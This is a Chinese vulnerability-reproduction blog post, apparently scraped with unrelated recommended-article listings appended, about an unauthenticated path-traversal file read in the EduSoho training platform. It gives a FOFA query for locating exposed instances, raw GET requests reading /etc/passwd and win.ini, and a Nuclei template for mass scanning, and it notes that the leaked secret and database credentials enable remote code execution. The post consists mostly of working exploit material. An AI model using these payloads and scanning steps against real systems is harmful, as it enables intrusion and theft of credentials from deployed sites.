zkzq
zkzq

【漏洞复现】EduSoho教培系统 任意文件读取

该文章由掌控安全学院——1782814368投稿

【产品介绍】

EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。

【漏洞介绍】

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

【资产测绘Query】

fofa语法:

 
  
     
   
  1. title="Powered By EduSoho" || body="Powered by EduSoho" || (body="Powered By EduSoho" && body="var app")
    2.  
  
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第1张图片
 
  
【产品界面】
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第2张图片
 
  
【漏洞复现】
 
  
【poc】
 
  
linux系统:
 
  
 
  
     
   
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
    2.  
   
  2. Host: 127.0.0.1
    3.  
  
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第3张图片
 
  

 windows系统:
 
  
 
  
     
   
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini HTTP/1.1
    2.  
   
  2. Host: 127.0.0.1
    3.  
  
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第4张图片
 
  
【Nuclei-Poc】
 
  
 
  
     
   
  1. id: EduSoho_arbitrary_file_read_crossplatform
    2.  
   
  2.  
   
  3. info:
    4.  
   
  4. name: EduSoho Cross-Platform Directory Traversal Vulnerability
    5.  
   
  5. author: yourname
    6.  
   
  6. severity: critical
    7.  
   
  7. description:
    8.  
   
  8. tags: directory-traversal,cve,critical
    9.  
   
  9.  
   
  10. requests:
    11.  
   
  11. - method: GET
    12.  
   
  12. path:
    13.  
   
  13. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
    14.  
   
  14. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini"
    15.  
   
  15.  
   
  16. matchers-condition: and
    17.  
   
  17. matchers:
    18.  
   
  18. - type: word
    19.  
   
  19. part: body
    20.  
   
  20. words:
    21.  
   
  21. - "root:x:0:0:root:/root:/bin/bash" # Unix-like systems
    22.  
   
  22. - "[extensions]" # Windows systems
    23.  
   
  23. condition: or
    24.  
   
  24.  
   
  25. - type: status
    26.  
   
  26. status:
    27.  
   
  27. - 200
    28.  
   
  28.  
   
  29. - type: word
    30.  
   
  30. part: body
    31.  
   
  31. negative: true
    32.  
   
  32. words:
    33.  
   
  33. - "empty file"
    34.  
   
  34. condition: and
    35.  
   
  35.  
   
  36. - type: word
    37.  
   
  37. part: body
    38.  
   
  38. negative: true
    39.  
   
  39. words:
    40.  
   
  40. - "\"success\": 0"
    41.  
   
  41. condition: and
    42.  
  
 
  
【验证】
 
  
.\nuclei -l 1.txt -t 4.yaml
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第5张图片
 
  
【修复建议】
 
  
1:更新到最新版本
 
  
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 
  
免费领取安全学习资料包!
 
  
渗透工具
 
  
 
  
技术文档、书籍
 
  
 
 
  
 
  
面试题
 
  
帮助你在面试中脱颖而出
 
  
 
  
视频
 
  
基础到进阶
 
  
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 
  
 
 
  
 
  
应急响应笔记
 
  
 
  
学习路线
 
  
 
  
 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(漏洞,漏洞挖掘,信息泄露)

        

            

                
    
                    
  • CVE-2021-41773 目录穿越复现并反弹shell
                        小彭爱学习
网络安全网络安全web安全安全
                        
    CVE-2021-41773目录穿越复现ApacheHTTPServer2.4.49路径穿越漏洞(CVE-2021-41773)ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:版本等于2.4.49穿越的目录允许被访问,比如配置了Requireallgranted。(
    
                    
    • 
                    
  • 技术速递|测试和 .NET Aspire 入门
                        微软Reactor
.net自动化
                        
    作者:AaronPowell-PrincipalCloudAdvocate排版:AlanWang自动化测试是软件开发的一个重要组成部分,有助于确保在早期发现漏洞并防止回归问题。在这篇博文中,我们将探讨如何开始在.NETAspire中进行测试,以便我们能够测试分布式应用程序中的各种场景。测试分布式应用程序分布式应用程序本质上很复杂,您需要确保数据库、缓存等组件可用且处于正确状态。然后您的应用程序可能
    
                    
    • 
                    
  • 文件上传绕过
                        Clockwiseee
android
                        
    文章目录攻击与绕过方式一、条件竞争二、二次渲染结合文件包含绕过1、gif2、png3、jpg三、.htaccess解析绕过四、文件后缀名绕过1、文件特殊后缀名+大小写绕过2、::$DATA绕过3、双后缀名绕过4、点绕过5、空格绕过五、文件头绕过六、短标签绕过七、MIME(Content-Type)绕过八、00截断九、垃圾字符绕过十、中间件解析漏洞十一、构造绕过十二、Content-Disposit
    
                    
    • 
                    
  • CTF-SQL注入总结
                        SVicen
CTFsqlweb安全安全
                        
    1、当URL地址传入的参数进行MD5加密时,可采用数组进行绕过。MD5对数组参数不会加密。$a=$GET['a'];$b=$_GET['b'];if($a!=$b&&md5($a)==md5($b)){echo$flag;}方法一:利用md5()函数的漏洞绕过即使用数组绕过的方法:由于md5对于字符串检验的时候,遇到数组会返回NULL所以两个数组经过加密后得到的都是NULL,也就是相等的。所以上传
    
                    
    • 
                    
  • Docker 容器网络问题排查与最佳实践 - PushGateway 部署案例分析
                        

                        
    qustion1.问题背景在数据中心部署PrometheusPushGateway服务时,遇到了一个典型的容器网络访问问题。相同的部署配置在不同数据中心呈现出不同的网络访问结果,本文将详细分析问题的排查过程和解决方案。2.问题现象搭建典型的pushgateway服务,使用了nginx与pushgateway整合,为什么整合呢?主要原因是安全扫描扫描出来很多pushgateway的安全漏洞,也木有经
    
                    
    • 
                    
  • python的异常处理--异常引入,异常处理,常见异常,断言,自定义异常
                        学python的土豆
python
                        
    python的异常处理一.异常引入二.异常处理三.常见异常四.断言五.自定义异常一.异常引入异常概念:程序在运行过程中发生不可预知的错误,程序员很难堵住所有的漏洞,就需要异常处理二.异常处理异常处理:捕获异常:try-except-else-finally将可能发生异常的代码,放入try-except中else:当代码没有异常就会执行else,如果代码块中有return,else将不执行final
    
                    
    • 
                    
  • 如何成为渗透测试工程师?从零到入门的完整指南
                        蜗牛在前行
web安全安全
                        
    如何成为渗透测试工程师?从零到入门的完整指南一、渗透测试工程师的核心职责渗透测试工程师通过模拟黑客攻击的方式,对目标系统(如网站、APP、网络设备等)进行安全测试,发现漏洞并提供修复建议。具体工作包括:漏洞挖掘:利用工具或手动测试寻找系统弱点(如SQL注入、XSS、权限绕过等)。编写报告:详细记录漏洞原理、复现步骤及修复方案。合规性测试:验证系统是否符合安全标准(如等保2.0、GDPR)。二、必备
    
                    
    • 
                    
  • PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
                        李火火安全阁
漏洞复现phpXAMPP开发语言
                        
    文章目录前言声明一、简介二、漏洞描述三、影响版本四、漏洞复现五、漏洞修复前言PHP在设计时忽略Windows中对字符转换的Best-Fit特性,当PHP-CGI运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过CVE-2012-1823补丁,从而可在无需登陆的情况下执行任意PHP代码声明请勿利用文章内的相关技术从事非法测试,由于传播、
    
                    
    • 
                    
  • 代码审计学习路线
                        白帽子技术分享
python网络安全代码审计
                        
    学习代码审计分以下四部分一.编程语言1.前端语言html/javascript/dom元素使用,主要是为了挖掘xss漏洞,jquery主要写一些涉及到CSRF脚本使用的或者DOM型XSS,JSON劫持等2.后端语言基础语法要知道,例如变量类型,常量,数组(python是列表,元组,字典),对象,类的调用,引用等,MVC设计模式要清楚,因为大部分目标程序都是基于MVC写的,包括不限于php,pyth
    
                    
    • 
                    
  • php代码审计学习路线
                        子非鱼999
杂记php学习开发语言
                        
    学习PHP代码审计可以帮助你识别和修复PHP应用中的安全漏洞,保护应用免受恶意攻击。以下是系统的PHP代码审计学习路线,从基础到高级逐步提升:一、基础阶段:打好编程和安全基础PHP基础学习PHP语言的基础知识,如变量、数据类型、数组、字符串处理、函数、类和对象等。学习PHP的常见操作:文件处理、会话管理、数据库操作(如MySQL)。推荐资源:PHP官方文档PHP相关学习网站(如菜鸟教程)Web安全
    
                    
    • 
                    
  • 八月刷题总结
                        Uzero.
ctf
                        
    2021DASCTFJulyXCBCTF--catflag考察日志文件位置,escapeshellarg函数绕过DASCTFJulyXCBCTF4th--ezrceYAPIMock远程代码执行漏洞BUUCTF--[HarekazeCTF2019]EasyNotesSESSION反序列化BUUCTF--[SWPU2019]Web3伪造Session,生成linux中的软链接BUUCTF--[wate
    
                    
    • 
                    
  • 【漏洞复现】Apache Tomcat条件竞争代码执行漏洞(CVE-2024-50379)
                        李火火安全阁
漏洞复现中间件漏洞apachetomcat
                        
    文章目录前言声明一、漏洞描述二、漏洞版本三、环境部署四、漏洞复现五、修复建议前言由于Windows文件系统与Tomcat在路径大小写区分处理上的不一致,当启用了默认servlet的写入功能(设置readonly=false且允许PUT方法),未经身份验证的攻击者可以构造特殊路径绕过Tomcat的路径校验机制,通过条件竞争不断发送请求上传包含恶意JSP代码的文件触发Tomcat对其解析和执行,从而实
    
                    
    • 
                    
  • 抖音黑科技是什么
                        vx_hhcs88688
科技
                        
    抖音黑科技指的是一些用户或开发者通过各种技巧和方法,来获取更多曝光、粉丝或其他优势的行为。这些技术可能包括但不限于利用平台算法的漏洞、使用自动化工具增加互动、利用非正常手段获取流量等。值得注意的是,抖音作为一个社交娱乐商务平台,鼓励用户在合规的前提下创造内容这些技术手段可以包括但不限于以下功能:集成资源:集成资源可以帮助用户获取人工、评论、点赞、关注等操作,以增加曝光和互动。这些资源会是大型机房来
    
                    
    • 
                    
  • 第26节课:内容安全策略(CSP)—构建安全网页的防御盾
                        学问小小谢
HTML学习安全前端学习服务器运维网络
                        
    目录CSP基础CSP的作用CSP的主要属性配置CSP通过响应头配置CSP通过HTML``标签配置CSP属性设置详解指定多个来源配置示例说明常见错误配置实践:CSP与XSS防护示例1:防止内联脚本和样式说明示例2:限制图片来源说明限制与注意事项结语在现代Web开发中,内容安全策略(CSP)是一种强大的工具,用于帮助开发者防止多种安全漏洞,尤其是跨站脚本(XSS)攻击。本节课将详细介绍CSP的基础知识
    
                    
    • 
                    
  • 2025.2.1——七、Web_php_unserialize 代码审计
                        然然阿然然
“破晓”计划第一阶段训练php网络安全学习安全网络
                        
    题目来源:攻防世界Web_php_unserialize目录一、打开靶机,整理信息二、解题思路step1:代码审计step2:绕过漏洞1.绕过__wakeup()2.绕过正则step3:脚本运行三、小结一、打开靶机,整理信息熟悉的代码审计,根据题目名称,还涉及到反序列化知识点二、解题思路step1:代码审计file=$file;//将传入的file参数赋值给当前对象的$file属性}functio
    
                    
    • 
                    
  • 核弹级0day深信服运维安全管理系统(堡垒机)存在信息泄露漏洞
                        SDASDASD111asd
0day安全运维网络web安全安全架构
                        
    0x01产品概述深信服运维安全管理系统侧重于运维安全管理,集账号管理、身份认证、单点登录、资源授权、访问控制和操作审计为一体,能够对IT资产(如服务器、网络设备、安全设备、数据库等)的操作过程进行有效的运维操作审计,使运维审计由事件审计提升为操作内容审计,通过事前预防、事中控制和事后审计的能力全面解决运维安全问题,进而提高IT运维管理水平。0x02漏洞概述0x03漏洞描述漏洞为Web站点的网络安全
    
                    
    • 
                    
  • 【漏洞复现】广联达 Linkworks OA ArchiveWebService XML实体注入漏洞
                        0x0000001
漏洞复现xml网络安全web安全渗透测试网络安全
                        
    免责声明:本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严重后果。作者对读者基于本文内容的行为不承担责任。读者在使用信息时必须遵守适用法律法规和服务协议,独自承担所有风险和责任。如有侵权,请联系删除。漏洞描述广联达L
    
                    
    • 
                    
  • 如何防御暴力攻击(Brute Force Attack)?
                        
安全防护
                        
    在不断变化的网络安全世界中,了解各种类型的攻击是保护自己或企业的第一步。其中一个常见的威胁是暴力攻击。让我们深入了解什么是暴力攻击,它是如何工作的,以及如何防止它。什么是暴力攻击顾名思义,暴力攻击依赖于暴力破解,这意味着它不利用任何软件漏洞或使用复杂的技术。相反,它依赖于纯粹的计算能力来彻底尝试所有的可能性。暴力攻击是一种反复试验的方法,用于获取诸如个人识别号码(PINs)、用户名、密码或其他类型
    
                    
    • 
                    
  • web安全漏洞之命令注入
                        rzydal
笔记网络安全web安全安全学习
                        
    命令注入1.什么是命令注入通常情况下,开发者使用一些可以执行命令的函数且未对用户输入进行安全检查时,可以造成命令注入。从CTF的角度来讲,命令注入可以实现:1、直接读取flag2、反弹shell3、利用题目环境漏洞,控制整个题目环境,干扰其他队伍解题在各类编程语言中,都存在直接调用系统命令的函数,比如PHP的system函数,Python的os.system,Java的Runtime.exec都可
    
                    
    • 
                    
  • XXL-JOB v2.4.2 发布 | 分布式任务调度平台
                        

                        
    ReleaseNotes1、【优化】调度中心任务Next计算逻辑调整,避免Cron解析失败导致重复执行问题。2、【优化】Cron解析组件代码重构微调,健壮性提升;3、【优化】修改密码交互调整,避免CSRF隐患;4、【优化】JdkSerializeTool流关闭逻辑优化;5、【优化】任务信息、执行日志API非功能设计完善,避免越权隐患;6、【修复】漏洞修复,包括"CVE-2024-42681"子任务
    
                    
    • 
                    
  • nginx安全配置
                        凉生ㄨ゛゛记忆﹎ゝ
nginx安全chrome
                        
    一、基础安全配置隐藏版本号信息默认情况下,Nginx会在响应头中显示版本号,这可能会给攻击者提供服务器信息。攻击者可以根据版本号查找对应版本的已知漏洞进行定向攻击。http{#关闭在响应头中显示Nginx版本号#默认响应头:Server:nginx/1.18.0#关闭后响应头:Server:nginxserver_tokensoff;}配置安全Headers添加安全相关的HTTP响应头,可以有效防
    
                    
    • 
                    
  • python渗透开发之 sql注入SqlmapApi自动化扫描方式讲解 单方法编写代码 SRC漏洞挖掘逻辑分析
                        浩浩测试一下
渗透测试开发pythonpygamevirtualenvplotlyscikit-learnpyqtscipy
                        
    目录介绍安装和配置Sqlmap启动SqlmapAPI服务:使用API进行扫描(Python代码部分)SQLMAPAPI开发整体过程获取任务ID设置任务ID扫描信息开始扫描对应ID任务读取扫描状态判断结果扫描结果查看扫描结束删除ID并获取结果最后:介绍SQL注入的自动化扫描方式,可以通过使用Sqlmap提供的API来实现。SQLMAP是一个强大的开源自动化SQL注入工具,可以用于发现和利用SQL注入
    
                    
    • 
                    
  • 跨平台物联网漏洞挖掘算法评估框架设计与实现申报书上
                        XLYcmy
漏洞挖掘网络安全漏洞挖掘物联网项目申报跨架构静态分析固件
                        
    本研究的研究目的主要有以下两个:1、基于此领域的相关方法,通过实验找出各个架构的最优方法2、通过设计实验,比较跨架构解决方案和各架构最优方法组合解决方案在函数识别、漏洞挖掘上的优劣性一、项目技术路线(1)构建统一规范全面的多架构物联网设备二进制程序数据集(2)针对跨架构下的二进制程序,利用逆向工具提取为图、抽象语法树等中间语言,对于不同中间语言,选择合适的深度学习方法提取出中间语言数据结构的特征,
    
                    
    • 
                    
  • Haskell语言的安全开发
                        慕璃嫣
包罗万象golang开发语言后端
                        
    Haskell语言的安全开发引言在现代软件开发中,安全性已经成为一个不可忽视的重要方面。一方面,随着信息技术的发展,各类网络攻击和安全漏洞层出不穷;另一方面,越来越多的项目要求遵循高安全标准,以保护用户的隐私和数据。在众多编程语言中,Haskell凭借其强大的类型系统和函数式编程模型,提供了许多内置特性来帮助开发者编写安全的代码。本文将深入探讨Haskell语言的安全开发方法,包含其特性、最佳实践
    
                    
    • 
                    
  • 跨平台物联网漏洞挖掘算法评估框架设计与实现文献综述之GMN
                        XLYcmy
漏洞挖掘物联网网络安全漏洞挖掘跨架构静态检测图神经网络项目报告
                        
    2.4Gemini和GMN我们采用了两种方式:Gemini和GMN。2.4.2GMN图神经网络(GraphNeuralNetworks-GNNs)是一种用于学习结构化数据及相关预测问题的方法。节点的表示被用于节点分类或生成图向量再用于分类。GMN模型针对图的相似性学习问题,提出了一种使用GNNs将图嵌入到向量空间,并通过交叉图注意机制来计算相似度分数以关联图之间的相似性的模型。GMN模型不是独立地
    
                    
    • 
                    
  • Nexpose 7.4.0 for Linux & Windows - 漏洞扫描
                        
漏洞
                        
    Nexpose7.4.0forLinux&Windows-漏洞扫描Rapid7on-premVulnerabilityManagement,releasedJan30,2025请访问原文链接:https://sysin.org/blog/nexpose-7/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgNexposeVulnerabilityScanner您的本地漏洞扫描程序搜
    
                    
    • 
                    
  • 告别数据泄露,美创科技数据库防水坝助力数据安全
                        科技热点快讯
安全
                        
    数据安全建设中,“人”是最关键的因素,但也是最薄弱的环节和漏洞。近年来,“内鬼式数据泄露”、“数据库恶意篡改”、“删库跑路“等事件屡见不鲜,严峻程度逐年升高。Verizon《2021年数据泄露调查报告》统计,当前,85%的数据泄露事件都与人为因素有关。企业多年倾心竭力打造的“坚固堡垒”,正因为安全意识薄弱、内部默认可信任机制、数据安全措施落实不到位等“沉疴”,越来越像一枚“硬壳软糖”!内部数据安全
    
                    
    • 
                    
  • 网络安全攻防实战:从基础防护到高级对抗
                        一ge科研小菜鸡
运维网络
                        
    个人主页:一ge科研小菜鸡-CSDN博客期待您的关注引言在信息化时代,网络安全已经成为企业、政府和个人必须重视的问题。从数据泄露到勒索软件攻击,每一次安全漏洞都可能造成巨大的经济损失和隐私风险。本教程将通过详细的案例、代码示例和实用工具,帮助读者从基础安全防护到高级安全对抗,系统掌握网络安全攻防的核心技术。1.常见网络攻击方式与防御措施1.1SQL注入攻击攻击者在输入字段中插入恶意SQL代码,绕过
    
                    
    • 
                    
  • 第25天:web攻防-通用漏洞&sql读写注入&MYSQL&MSSQL
                        不灭锦鲤
sqlmysqlsqlserver
                        
    #知识点:1、sql注入-mysql数据库2、sql注入-mssql数据库3、sql注入-postgreSQL数据库#详细点:Access无高权限注入点-只能猜解,还是暴力猜解MYSQL,PostgreSQL,MSSQL高权限注入,可升级为读写执行。演示案例MYSQL读取文件内容,记把my.ini改成utf-8的格式使用load_file读取网站关键性内容,在sql注入中,我试了读取不道,明明在数
    
                    
    • 
                    
  • 【高效学习方法分享】费曼学习法
                        AI天才研究院
每月推书学习
                        
    费曼学习法费曼学习法是美国著名物理学家理查德·费曼总结出来的一种学习方法。费曼学习法的核心是:“用转述、教给别人的方法巩固自己的知识”。具体步骤包括四个步骤:确定学习目标:将一个自己不理解的、没见过的概念或难题写在纸上。像老师一样教给别人:模拟自己是一位老师,面对完全不懂这个领域的人,用自己的话,尽可能具体形象地讲诉。回顾:找到漏洞,重新学习反思第2步遇到的问题,哪些地方卡壳了?哪些地方对方没有真
    
                    
    • 
                                
  • ViewController添加button按钮解析。(翻译)
                                    张亚雄
c
                                    
    <div class="it610-blog-content-contain" style="font-size: 14px"></div>//  ViewController.m 
//  Reservation software 
// 
//  Created by 张亚雄 on 15/6/2. 

    
                                
    • 
                                
  • mongoDB 简单的增删改查
                                    开窍的石头
mongodb
                                    
       在上一篇文章中我们已经讲了mongodb怎么安装和数据库/表的创建。在这里我们讲mongoDB的数据库操作 
      在mongo中对于不存在的表当你用db.表名 他会自动统计 
下边用到的user是表明,db代表的是数据库 
 
      添加(insert): 

    
                                
    • 
                                
  • log4j配置
                                    0624chenhong
log4j
                                    
    1) 新建java项目 
2) 导入jar包,项目右击,properties—java build path—libraries—Add External jar,加入log4j.jar包。 
3) 新建一个类com.hand.Log4jTest 
 

package com.hand;

import org.apache.log4j.Logger;


public class 
    
                                
    • 
                                
  • 多点触摸(图片缩放为例)
                                    不懂事的小屁孩
多点触摸
                                    
    多点触摸的事件跟单点是大同小异的,上个图片缩放的代码,供大家参考一下 
 


import android.app.Activity;
import android.os.Bundle;
import android.view.MotionEvent;
import android.view.View;
import android.view.View.OnTouchListener
    
                                
    • 
                                
  • 有关浏览器窗口宽度高度几个值的解析
                                    换个号韩国红果果
JavaScripthtml
                                    
    1 元素的 offsetWidth 包括border padding  content  整体的宽度。 
clientWidth  只包括内容区 padding 不包括border。 
clientLeft =  offsetWidth -clientWidth  即这个元素border的值 
offsetLeft  若无已定位的包裹元素
    
                                
    • 
                                
  • 数据库产品巡礼:IBM DB2概览
                                    蓝儿唯美
db2
                                    
    IBM DB2是一个支持了NoSQL功能的关系数据库管理系统,其包含了对XML,图像存储和Java脚本对象表示(JSON)的支持。DB2可被各种类型的企 业使用,它提供了一个数据平台,同时支持事务和分析操作,通过提供持续的数据流来保持事务工作流和分析操作的高效性。 DB2支持的操作系统 
DB2可应用于以下三个主要的平台: 
  
 
 工作站,DB2可在Linus、Unix、Windo
    
                                
    • 
                                
  • java笔记5
                                    a-john
java
                                    
    控制执行流程: 
1,true和false 
   利用条件表达式的真或假来决定执行路径。例:(a==b)。它利用条件操作符“==”来判断a值是否等于b值,返回true或false。java不允许我们将一个数字作为布尔值使用,虽然这在C和C++里是允许的。如果想在布尔测试中使用一个非布尔值,那么首先必须用一个条件表达式将其转化成布尔值,例如if(a!=0)。 
2,if-els
    
                                
    • 
                                
  • Web开发常用手册汇总
                                    aijuans
PHP
                                    
    一门技术,如果没有好的参考手册指导,很难普及大众。这其实就是为什么很多技术,非常好,却得不到普遍运用的原因。
 正如我们学习一门技术,过程大概是这个样子:
 ①我们日常工作中,遇到了问题,困难。寻找解决方案,即寻找新的技术;
 ②为什么要学习这门技术?这门技术是不是很好的解决了我们遇到的难题,困惑。这个问题,非常重要,我们不是为了学习技术而学习技术,而是为了更好的处理我们遇到的问题,才需要学习新的
    
                                
    • 
                                
  • 今天帮助人解决的一个sql问题
                                    asialee
sql
                                    
                今天有个人问了一个问题,如下: 
type     AD      value           
A  
    
                                
    • 
                                
  • 意图对象传递数据
                                    百合不是茶
android意图IntentBundle对象数据的传递
                                    
    学习意图将数据传递给目标活动; 初学者需要好好研究的 
   
   1,将下面的代码添加到main.xml中 
   
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http:/
    
                                
    • 
                                
  • oracle查询锁表解锁语句
                                    bijian1013
oracleobjectsessionkill
                                    
    一.查询锁定的表 
如下语句,都可以查询锁定的表 
语句一: 
select a.sid,
       a.serial#,
       p.spid,
       c.object_name,
       b.session_id,
       b.oracle_username,
       b.os_user_name
  from v$process p, v$s
    
                                
    • 
                                
  • mac osx 10.10 下安装 mysql 5.6 二进制文件[tar.gz]
                                    征客丶
mysqlosx
                                    
    场景:在 mac osx 10.10 下安装 mysql 5.6 的二进制文件。 
 
环境:mac osx 10.10、mysql 5.6 的二进制文件 
 
步骤:[所有目录请从根“/”目录开始取,以免层级弄错导致找不到目录] 
1、下载 mysql 5.6 的二进制文件,下载目录下面称之为 mysql5.6SourceDir; 
下载地址:http://dev.mysql.com/downl
    
                                
    • 
                                
  • 分布式系统与框架
                                    bit1129
分布式
                                    
    RPC框架 Dubbo 
什么是Dubbo 
  
Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。其核心部分包含:    远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。    集群容错: 提供基于接
    
                                
    • 
                                
  • 那些令人蛋痛的专业术语
                                    白糖_
springWebSSOIOC
                                    
     
 spring 
 
【控制反转(IOC)/依赖注入(DI)】: 
由容器控制程序之间的关系,而非传统实现中,由程序代码直接操控。这也就是所谓“控制反转”的概念所在:控制权由应用代码中转到了外部容器,控制权的转移,是所谓反转。 
简单的说:对象的创建又容器(比如spring容器)来执行,程序里不直接new对象。 
 
 Web 
 
【单点登录(SSO)】:SSO的定义是在多个应用系统中,用户
    
                                
    • 
                                
  • 《给大忙人看的java8》摘抄
                                    braveCS
java8
                                    
    函数式接口:只包含一个抽象方法的接口 
lambda表达式:是一段可以传递的代码 
  
  
  
你最好将一个lambda表达式想象成一个函数,而不是一个对象,并记住它可以被转换为一个函数式接口。 
事实上,函数式接口的转换是你在Java中使用lambda表达式能做的唯一一件事。 
  
方法引用:又是要传递给其他代码的操作已经有实现的方法了,这时可以使
    
                                
    • 
                                
  • 编程之美-计算字符串的相似度
                                    bylijinnan
java算法编程之美
                                    
    

public class StringDistance {

	/**
	 * 编程之美 计算字符串的相似度
	 * 我们定义一套操作方法来把两个不相同的字符串变得相同,具体的操作方法为:
	 * 1.修改一个字符(如把“a”替换为“b”);
	 * 2.增加一个字符(如把“abdd”变为“aebdd”);
	 * 3.删除一个字符(如把“travelling”变为“trav
    
                                
    • 
                                
  • 上传、下载压缩图片
                                    chengxuyuancsdn
下载
                                    
    /**
	 * 
	 * @param uploadImage --本地路径(tomacat路径)
	 * @param serverDir   --服务器路径
	 * @param imageType   --文件或图片类型
	 * 此方法可以上传文件或图片.txt,.jpg,.gif等
	 */
	public void upload(String uploadImage,Str
    
                                
    • 
                                
  • bellman-ford(贝尔曼-福特)算法
                                    comsci
算法F#
                                    
    Bellman-Ford算法(根据发明者 Richard Bellman 和 Lester Ford 命名)是求解单源最短路径问题的一种算法。单源点的最短路径问题是指:给定一个加权有向图G和源点s,对于图G中的任意一点v,求从s到v的最短路径。有时候这种算法也被称为 Moore-Bellman-Ford 算法,因为 Edward F. Moore zu 也为这个算法的发展做出了贡献。 
 
与迪科
    
                                
    • 
                                
  • oracle ASM中ASM_POWER_LIMIT参数
                                    daizj
ASMoracleASM_POWER_LIMIT磁盘平衡
                                    
    ASM_POWER_LIMIT 
该初始化参数用于指定ASM例程平衡磁盘所用的最大权值,其数值范围为0~11,默认值为1。该初始化参数是动态参数,可以使用ALTER  SESSION或ALTER  SYSTEM命令进行修改。示例如下: 
 
SQL>ALTER  SESSION  SET   Asm_power_limit=2; 

    
                                
    • 
                                
  • 高级排序:快速排序
                                    dieslrae
快速排序
                                    
    
    public void quickSort(int[] array){
        this.quickSort(array, 0, array.length - 1);
    }
    
    public void quickSort(int[] array,int left,int right){
        if(right - left <= 0
    
                                
    • 
                                
  • C语言学习六指针_何谓变量的地址 一个指针变量到底占几个字节
                                    dcj3sjt126com
C语言
                                    
    # include <stdio.h>

int main(void)
{
	/*
	1、一个变量的地址只用第一个字节表示
	2、虽然他只使用了第一个字节表示,但是他本身指针变量类型就可以确定出他指向的指针变量占几个字节了
	3、他都只存了第一个字节地址,为什么只需要存一个字节的地址,却占了4个字节,虽然只有一个字节,
		但是这些字节比较多,所以编号就比较大,
		
    
                                
    • 
                                
  • phpize使用方法
                                    dcj3sjt126com
PHP
                                    
    phpize是用来扩展php扩展模块的,通过phpize可以建立php的外挂模块,下面介绍一个它的使用方法,需要的朋友可以参考下 
安装(fastcgi模式)的时候,常常有这样一句命令: 
代码如下: 
/usr/local/webserver/php/bin/phpize 
  
一、phpize是干嘛的? 
phpize是什么? 
phpize是用来扩展php扩展模块的,通过phpi
    
                                
    • 
                                
  • Java虚拟机学习 - 对象引用强度
                                    shuizhaosi888
JAVA虚拟机
                                    
     
 本文原文链接:http://blog.csdn.net/java2000_wl/article/details/8090276 转载请注明出处! 
 无论是通过计数算法判断对象的引用数量,还是通过根搜索算法判断对象引用链是否可达,判定对象是否存活都与“引用”相关。 
 引用主要分为 :强引用(Strong Reference)、软引用(Soft Reference)、弱引用(Wea
    
                                
    • 
                                
  • .NET Framework 3.5 Service Pack 1(完整软件包)下载地址
                                    happyqing
.net下载framework
                                    
      
Microsoft .NET Framework 3.5 Service Pack 1(完整软件包)  
http://www.microsoft.com/zh-cn/download/details.aspx?id=25150 
Microsoft .NET Framework 3.5 Service Pack 1 是一个累积更新,包含很多基于 .NET Framewo
    
                                
    • 
                                
  • JAVA定时器的使用
                                    jingjing0907
javatimer线程定时器
                                    
    1、在应用开发中,经常需要一些周期性的操作,比如每5分钟执行某一操作等。 
对于这样的操作最方便、高效的实现方式就是使用java.util.Timer工具类。 
privatejava.util.Timer timer; 
timer = newTimer(true); 
timer.schedule( 
newjava.util.TimerTask() { public void run() 

    
                                
    • 
                                
  • Webbench
                                    流浪鱼
webbench
                                    
    首页下载地址 http://home.tiscali.cz/~cz210552/webbench.html 
Webbench是知名的网站压力测试工具,它是由Lionbridge公司(http://www.lionbridge.com)开发。 
Webbench能测试处在相同硬件上,不同服务的性能以及不同硬件上同一个服务的运行状况。webbench的标准测试可以向我们展示服务器的两项内容:每秒钟相
    
                                
    • 
                                
  • 第11章 动画效果(中)
                                    onestopweb
动画
                                    
    index.html 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
    
                                
    • 
                                
  • windows下制作bat启动脚本.
                                    sanyecao2314
javacmd脚本bat
                                    
    java -classpath C:\dwjj\commons-dbcp.jar;C:\dwjj\commons-pool.jar;C:\dwjj\log4j-1.2.16.jar;C:\dwjj\poi-3.9-20121203.jar;C:\dwjj\sqljdbc4.jar;C:\dwjj\voucherimp.jar com.citsamex.core.startup.MainStart 
    
                                
    • 
                                
  • Java进行RSA加解密的例子
                                    tomcat_oracle
java
                                    
